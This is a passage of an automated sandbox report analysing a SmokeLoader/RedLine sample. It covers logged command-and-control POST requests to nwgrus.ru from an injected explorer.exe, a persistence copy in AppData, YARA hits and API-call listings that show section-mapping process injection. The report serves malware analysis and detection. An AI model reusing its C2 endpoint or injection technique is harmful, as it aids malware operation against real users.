Oct 13, 2024 18:30:52.041395903 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	65288	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:56.479343891 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qkfisicqugofkqpv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: nwgrus.ru
Oct 13, 2024 18:30:56.479343891 CEST	139	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 1c a3 98 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vup[NMlqS6dn+) GD}twKO9x
Oct 13, 2024 18:30:57.539180040 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	65289	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:31:03.440818071 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://abelcascgtcbciky.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: nwgrus.ru
Oct 13, 2024 18:31:03.440851927 CEST	229	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 3a cb fa Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuW:g'k^72T4*n-^;^"'pO!CzJ&4IF';E@tX9VO!z1\|`Cf
Oct 13, 2024 18:31:04.500907898 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:31:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	65290	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:31:09.036417961 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pcjiyoflornot.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: nwgrus.ru
Oct 13, 2024 18:31:09.036448956 CEST	339	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 0b d7 85 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuNX^W92\|Q%$"#C^M"@][YA$E(!WK.kl--/ 'njsY) @
Oct 13, 2024 18:31:10.096421957 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:31:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	12:27:06
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\K80v6DHFHE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\K80v6DHFHE.exe"
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	278DF1E655D9D27B659468EA21758D17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:27:19
Start date:	13/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:27:41
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\wafguag
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wafguag
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	278DF1E655D9D27B659468EA21758D17
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs Detection: 41%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:30:01
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\wafguag
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wafguag
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	278DF1E655D9D27B659468EA21758D17
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	28.5%
Signature Coverage:	41.9%
Total number of Nodes:	172
Total number of Limit Nodes:	6

Executed Functions

Function 00415530 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 302
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415602
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041561B
FindAtomW.KERNEL32(00000000), ref: 00415622
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041562A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415642
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415669
MoveFileW.KERNEL32(00000000,00000000), ref: 00415671
GetVersionExW.KERNEL32(?), ref: 0041567E
DisconnectNamedPipe.KERNEL32(?), ref: 00415691
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004156D6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004156E5
LCMapStringA.KERNEL32(00000000,00000000,004173A8,00000000,?,00000000), ref: 004156FB
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041570D
PulseEvent.KERNEL32(00000000), ref: 0041571D
SetCommState.KERNELBASE(00000000,00000000), ref: 00415744
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415775
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415786
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041578E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173D8,?,00000000), ref: 004157CE
GetFileAttributesW.KERNEL32(00000000), ref: 004157D5
GetConsoleAliasExesLengthA.KERNEL32 ref: 004157DB
GetBinaryType.KERNEL32(004173E8,?), ref: 004157ED
GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004157F7
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041580A
LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
InterlockedDecrement.KERNEL32(?), ref: 004158E0

Strings

k`, xrefs: 004158C3
}$, xrefs: 004158E7

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: Console$CommFile$FormatInterlockedLengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDecrementDefaultDisconnectEventExchangeExesFindInfoLibraryLoadLocaleMessageModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
String ID: k`$}$
API String ID: 777263412-956986773
Opcode ID: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
Instruction ID: 28d08a9e12edc1d56af3eee545ba5f80b0898f125747bb2d66328808cc3604cb
Opcode Fuzzy Hash: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
Instruction Fuzzy Hash: A4B1D071802924EBD721EB61EC48ADB7F79FF89351F41406AF50AA7150DB384A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02B8016D Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B80195
Module32First.KERNEL32(00000000,00000224), ref: 02B801B5

Memory Dump Source

Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: bf4a9e3657ffdaeef2899488f72de691baf1c3ad4d31ed63f11059f7dd263577
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 2EF09C351007106FD7203BF5988DB7F76E9EF496B4F100968F55BD14C0D770E9898661

Function 02C7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C7024D

Strings

kernel32.dll, xrefs: 02C7008F, 02C70095
cess, xrefs: 02C7018D

Memory Dump Source

Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

Function 00415867 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
InterlockedDecrement.KERNEL32(?), ref: 004158E0

Strings

k`, xrefs: 004158C3
}$, xrefs: 004158E7

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
Instruction ID: 273e988762e02699ff252dc655ae774bf30313f900aa46e77cba19cfb1f4ca4e
Opcode Fuzzy Hash: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
Instruction Fuzzy Hash: 71113670D41A10CBDB20EB6099857DABB64FBC8365F92043BD94997251CA3C88E18B99

Function 004151B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041528F
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004152CC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004152EB

Strings

, xrefs: 004151F5

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
Instruction ID: 6a590a8926acfa3c7df48d762a2d30e232421f7677ab7ce89d68225f10d6884e
Opcode Fuzzy Hash: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
Instruction Fuzzy Hash: DE311C20A5B680CBF301CB78F8047923E62BB25744F44847895498B3A5EBBA5534E7EF

Function 02C70E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C70223,?,?), ref: 02C70E19
SetErrorMode.KERNELBASE(00000000,?,?,02C70223,?,?), ref: 02C70E1E

Memory Dump Source

Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source
